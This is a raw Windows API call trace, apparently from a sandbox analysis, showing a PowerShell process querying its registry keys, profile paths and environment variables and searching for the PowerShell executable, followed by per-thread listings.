	[0868.138] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc5c, lpData=0x0, lpcbData=0x12dc58*=0x0 | out: lpType=0x12dc5c*=0x1, lpData=0x0, lpcbData=0x12dc58*=0x56) returned 0x0
	[0868.138] CoTaskMemAlloc (cb=0x5a) returned 0x1b849cf0
	[0868.138] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc2c, lpData=0x1b849cf0, lpcbData=0x12dc28*=0x56 | out: lpType=0x12dc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dc28*=0x56) returned 0x0
	[0868.138] CoTaskMemFree (pv=0x1b849cf0) 
	[0868.138] RegCloseKey (hKey=0x388) returned 0x0
	[0868.138] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dcd8 | out: phkResult=0x12dcd8*=0x388) returned 0x0
	[0868.139] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc5c, lpData=0x0, lpcbData=0x12dc58*=0x0 | out: lpType=0x12dc5c*=0x1, lpData=0x0, lpcbData=0x12dc58*=0x56) returned 0x0
	[0868.139] CoTaskMemAlloc (cb=0x5a) returned 0x1b849cf0
	[0868.139] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc2c, lpData=0x1b849cf0, lpcbData=0x12dc28*=0x56 | out: lpType=0x12dc2c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dc28*=0x56) returned 0x0
	[0868.139] CoTaskMemFree (pv=0x1b849cf0) 
	[0868.139] RegCloseKey (hKey=0x388) returned 0x0
	[0868.139] CoTaskMemAlloc (cb=0x20c) returned 0x1b83b480
	[0868.139] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b83b480 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0868.140] CoTaskMemFree (pv=0x1b83b480) 
	[0868.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0868.140] CoTaskMemAlloc (cb=0x20c) returned 0x1b83b480
	[0868.140] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b83b480 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0868.140] CoTaskMemFree (pv=0x1b83b480) 
	[0868.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d890, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0868.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0868.740] SetErrorMode (uMode=0x1) returned 0x1
	[0868.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dc40 | out: lpFileInformation=0x12dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0868.740] SetErrorMode (uMode=0x1) returned 0x1
	[0868.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0868.740] SetErrorMode (uMode=0x1) returned 0x1
	[0868.740] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dc40 | out: lpFileInformation=0x12dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0868.740] SetErrorMode (uMode=0x1) returned 0x1
	[0868.740] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0868.741] SetErrorMode (uMode=0x1) returned 0x1
	[0868.741] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dc40 | out: lpFileInformation=0x12dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0868.741] SetErrorMode (uMode=0x1) returned 0x1
	[0868.741] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12da30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0868.741] SetErrorMode (uMode=0x1) returned 0x1
	[0868.741] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12dc40 | out: lpFileInformation=0x12dc40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0868.741] SetErrorMode (uMode=0x1) returned 0x1
	[0868.744] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.744] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.745] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.745] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.747] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.747] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.750] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.750] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.755] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.755] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2f8
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xe4
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x30c
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x318
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x324
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x328
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0868.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0868.760] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.760] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.762] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0868.762] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12de20 | out: lpMode=0x12de20) returned 1
	[0868.764] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.764] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.767] SetEvent (hEvent=0x38c) returned 1
	[0868.767] SetEvent (hEvent=0x388) returned 1
	[0868.767] SetEvent (hEvent=0x2f8) returned 1
	[0868.767] SetEvent (hEvent=0xe4) returned 1
	[0868.769] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.769] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.769] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12db78 | out: phkResult=0x12db78*=0x340) returned 0x0
	[0868.769] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12dafc, lpData=0x0, lpcbData=0x12daf8*=0x0 | out: lpType=0x12dafc*=0x0, lpData=0x0, lpcbData=0x12daf8*=0x0) returned 0x2

Thread:
	id = 440
	os_tid = 0x10cc


Thread:
	id = 444
	os_tid = 0x10dc


Thread:
	id = 1230
	os_tid = 0x1be0


Thread:
	id = 1232
	os_tid = 0x1bf4


Thread:
	id = 1256
	os_tid = 0x1c4c


Thread:
	id = 1315
	os_tid = 0x1dc8


Thread:
	id = 1316
	os_tid = 0x1dcc

	[0670.300] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0782.597] RegCloseKey (hKey=0x2f4) returned 0x0
	[0782.597] RegCloseKey (hKey=0x2fc) returned 0x0
	[0782.597] RegCloseKey (hKey=0x2f8) returned 0x0
	[0801.735] LocalFree (hMem=0x291a60) returned 0x0
	[0801.735] RegCloseKey (hKey=0x314) returned 0x0
	[0801.736] LocalFree (hMem=0x291820) returned 0x0
	[0801.736] CloseHandle (hObject=0x2f8) returned 1
	[0801.736] CloseHandle (hObject=0x13) returned 1
	[0801.737] CloseHandle (hObject=0xf) returned 1
	[0810.480] RegCloseKey (hKey=0x2f8) returned 0x0
	[0855.607] RegCloseKey (hKey=0x360) returned 0x0
	[0855.607] RegCloseKey (hKey=0x39c) returned 0x0
	[0855.607] RegCloseKey (hKey=0x37c) returned 0x0
	[0855.608] RegCloseKey (hKey=0x378) returned 0x0
	[0855.608] RegCloseKey (hKey=0x374) returned 0x0
	[0855.608] RegCloseKey (hKey=0x370) returned 0x0
	[0855.609] RegCloseKey (hKey=0x36c) returned 0x0
	[0855.609] RegCloseKey (hKey=0x368) returned 0x0
	[0855.609] RegCloseKey (hKey=0x364) returned 0x0
	[0855.609] RegCloseKey (hKey=0x33c) returned 0x0
	[0855.610] RegCloseKey (hKey=0x398) returned 0x0
	[0855.610] RegCloseKey (hKey=0x394) returned 0x0
	[0855.610] RegCloseKey (hKey=0x35c) returned 0x0
	[0855.610] RegCloseKey (hKey=0x358) returned 0x0
	[0855.610] RegCloseKey (hKey=0x354) returned 0x0
	[0855.611] RegCloseKey (hKey=0x350) returned 0x0
	[0855.611] RegCloseKey (hKey=0x34c) returned 0x0
	[0855.611] RegCloseKey (hKey=0x348) returned 0x0
	[0855.611] RegCloseKey (hKey=0x344) returned 0x0
	[0855.612] RegCloseKey (hKey=0x340) returned 0x0
	[0855.612] RegCloseKey (hKey=0x390) returned 0x0
	[0855.612] RegCloseKey (hKey=0x330) returned 0x0
	[0855.613] RegCloseKey (hKey=0x32c) returned 0x0
	[0855.613] RegCloseKey (hKey=0x328) returned 0x0
	[0855.613] RegCloseKey (hKey=0x324) returned 0x0
	[0855.613] RegCloseKey (hKey=0x320) returned 0x0
	[0855.614] RegCloseKey (hKey=0x31c) returned 0x0
	[0855.614] RegCloseKey (hKey=0x318) returned 0x0
	[0855.614] RegCloseKey (hKey=0x30c) returned 0x0
	[0855.614] RegCloseKey (hKey=0x38c) returned 0x0
	[0855.615] RegCloseKey (hKey=0xe4) returned 0x0
	[0855.615] RegCloseKey (hKey=0x2f8) returned 0x0
	[0855.615] RegCloseKey (hKey=0x388) returned 0x0
	[0855.615] RegCloseKey (hKey=0x384) returned 0x0
	[0892.846] RegCloseKey (hKey=0x340) returned 0x0

Thread:
	id = 1321
	os_tid = 0x1de4


Thread:
	id = 1525
	os_tid = 0x1e0c


Thread:
	id = 1883
	os_tid = 0x2514

	[0869.471] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0869.477] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0869.481] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.482] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.483] VirtualQuery (in: lpAddress=0x1c98dd40, lpBuffer=0x1c98ec00, dwLength=0x30 | out: lpBuffer=0x1c98ec00*(BaseAddress=0x1c98d000, AllocationBase=0x1c000000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0869.487] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.487] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.489] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.490] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.493] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.493] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.502] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.502] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.505] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.505] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.506] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.506] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.511] VirtualQuery (in: lpAddress=0x1c98dff0, lpBuffer=0x1c98eeb0, dwLength=0x30 | out: lpBuffer=0x1c98eeb0*(BaseAddress=0x1c98d000, AllocationBase=0x1c000000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0869.512] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.512] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.514] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.514] CoTaskMemFree (pv=0x2a6cc0) 
	[0869.515] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0869.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0869.515] CoTaskMemFree (pv=0x2a6cc0) 
	[0870.922] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0870.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.922] CoTaskMemFree (pv=0x2a6cc0) 
	[0870.926] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0870.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0870.927] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.195] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.195] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.198] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.198] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.199] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.199] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.202] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.203] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.204] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.204] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.206] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.206] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.208] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.208] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.595] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0871.595] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.864] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.864] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0871.864] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.870] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0871.870] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0871.870] CoTaskMemFree (pv=0x2a6cc0) 
	[0871.870] CoTaskMemAlloc (cb=0x128) returned 0x241a20
	[0871.870] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x241a20, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0871.870] CoTaskMemFree (pv=0x241a20) 
	[0871.875] CoTaskMemAlloc (cb=0x20e) returned 0x1b83a990
	[0871.875] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b83a990 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0871.875] CoTaskMemFree (pv=0x1b83a990) 
	[0871.879] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.881] SetErrorMode (uMode=0x1) returned 0x1
	[0871.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.901] SetErrorMode (uMode=0x1) returned 0x1
	[0871.903] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.903] SetErrorMode (uMode=0x1) returned 0x1
	[0871.903] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.911] SetErrorMode (uMode=0x1) returned 0x1
	[0871.912] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.912] SetErrorMode (uMode=0x1) returned 0x1
	[0871.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.921] SetErrorMode (uMode=0x1) returned 0x1
	[0871.922] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.923] SetErrorMode (uMode=0x1) returned 0x1
	[0871.923] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.930] SetErrorMode (uMode=0x1) returned 0x1
	[0871.932] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.932] SetErrorMode (uMode=0x1) returned 0x1
	[0871.932] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.875] SetErrorMode (uMode=0x1) returned 0x1
